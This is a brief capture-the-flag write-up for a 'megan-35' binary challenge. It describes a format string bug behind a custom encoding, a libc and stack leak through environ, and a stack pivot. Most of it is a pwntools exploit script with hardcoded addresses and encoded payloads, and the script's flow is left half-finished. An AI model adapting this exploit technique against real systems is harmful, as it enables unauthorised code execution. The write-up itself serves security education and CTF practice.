Megan-35 is an Encryption algorithim which has been directly implemented in this program. It takes a string, encrypts it
and then stores it in another buffer. Then however, it does
printf(buf);
Format String bug. If we send in a string which when decoded gives %p then we will trigger the fms.
Instead of building an encryptor for my program itself, I used an online service.
ASLR is disabled on the server but we still don’t know any address. So start with leaking libc.
After leaking libc, use %s and provide address of environ. That will get us stack address.
Then I simply pivoted stack to where my ropchain is.
Full exploit code:
#!/usr/bin/python
from pwn import *
p = process("./megan-35",env={"LD_PRELOAD":"./libc.so.6"})
#p = remote("megan35.stillhackinganyway.nl", 3535)
raw_input()
# Magic = 0xf7e5a819
#buf = p32(0xffffde4c)
# Overwrite with 0x080484e0.
buf = p32(0x08049f0c)
buf += (p32(0xdeadbeef))*3
buf += p32(0xf7e53940)
#buf += p32(0xf7e5a940)
buf += p32(0xdeadbeef)
buf += p32(0x80482d6)
buf += p32(0xdeadbeef)
buf += p32(0xdeadbeef)
# Overwrite de3c with address of our code (dc20). So stack pivoting kind of.
#buf += pad
#buf += "OdNvmHesSh31RZfqOdNvmHesSh31RZfqOdNvmHesSh31RZfqOdNvmHesSh31RZfqOdNvmHesSh31RZfqOdNvmHesSh31RZfqOdNvmHesSh31RZfqOdNvmHesSh31RZfqOdNvmHesSh31RZfqOdNvmHesSh31RZfq"
#buf += "OdNvmHesSh31RZfqOdNvmHesSh31RZfqOdNvkLy5"
# environ address.
#buf += "OdNvoHesShW1RZfyOdNvoHesShW1RZerRt=yOdNvkLy5"
buf += "OdNvoHesShW1RZfyOdNvoHesShW1RZesTIbqoHesSgXV"
########
#buf = p32(0xf7fd1dbc)
buf = p32(0xf7fcadbc)
#buf += "OdNvmHesSh31RZfqOdNvmHesSh31RZfqOdNvmHesShR5"
buf += "OdNvmHesSh31RZfqOdNvmHesSh31RZfqOdNvmq55"
########
log.info("Length: " + str(len(buf)))
p.sendline(buf)
leak = p.recv()
leak = p.recv()
leak = leak.split()
print leak
leak = leak[len(leak)-1]
leak = leak[0:4]
leak = u32(leak)
print hex(leak)
p.interactive()